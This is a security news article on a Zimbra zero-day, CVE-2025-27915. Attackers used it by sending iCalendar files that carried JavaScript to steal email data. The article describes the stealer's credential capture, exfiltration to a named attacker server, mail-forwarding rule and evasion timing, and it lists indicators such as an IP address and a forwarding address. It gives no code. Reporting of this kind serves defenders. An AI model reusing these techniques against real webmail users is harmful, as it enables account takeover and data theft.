Hackers Exploit Zimbra Vulnerability as 0-Day with Weaponized iCalendar Files

A zero-day vulnerability in the Zimbra Collaboration Suite (ZCS) was actively exploited in targeted attacks earlier in 2025.

The flaw, identified as CVE-2025-27915, is a stored cross-site scripting (XSS) vulnerability that attackers leveraged by sending weaponized iCalendar (.ICS) files to steal sensitive data from victims’ email accounts.

The attacks were first identified by StrikeReady, which began monitoring for unusually large iCalendar files that contained JavaScript.

One notable attack targeted Brazil’s military, where an attacker, using an IP address of 193.29.58.37, spoofed the Libyan Navy’s Office of Protocol to deliver the then-unknown exploit.

The core of the issue lies within Zimbra’s Classic Web Client, which failed to properly sanitize HTML content within iCalendar files. This allowed threat actors to embed malicious JavaScript inside a .ICS attachment.

When a user opened an email containing the malicious calendar entry, the script would execute within the user’s active session.

This XSS vulnerability, often considered less severe than remote code execution (RCE) flaws, proved highly effective.

It enabled attackers to run arbitrary code to perform unauthorized actions, including data exfiltration and session hijacking, without the user’s knowledge.

Zimbra addressed the vulnerability on January 27, 2025, by releasing patches (versions 9.0.0 P44, 10.0.13, and 10.1.5), though evidence shows the exploit was used before the fix was available.

A Comprehensive Data-Stealing Payload

The JavaScript payload delivered through the exploit is a sophisticated data stealer designed specifically for Zimbra webmail. Its capabilities include:

• Credential Theft: It creates hidden form fields to capture usernames and passwords from login pages.
• Data Exfiltration: The script is programmed to steal a wide array of information, including emails, contacts, distribution lists, shared folders, scratch codes, and trusted device information. The stolen data is sent to an attacker-controlled server at https://ffrk.net/apache2_config_default_51_2_1.
• Activity Monitoring: It monitors user activity and, if a user is inactive, triggers data theft before logging them out.
• Email Forwarding: The malware adds a malicious email filter rule named “Correo” to automatically forward the victim’s emails to an external address, spam_to_junk@proton.me.
• Evasion Techniques: To avoid detection, the script employs a 60-second delay before execution, limits its execution to once every three days, and hides user interface elements to conceal its activity.

While direct attribution remains unconfirmed, researchers note the tactics are similar to those used by a prolific Russian-linked threat actor and the group UNC1151, which has been linked to the Belarusian government.

This incident underscores the significant threat posed by XSS vulnerabilities in enterprise environments and the importance of applying security patches promptly.

Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today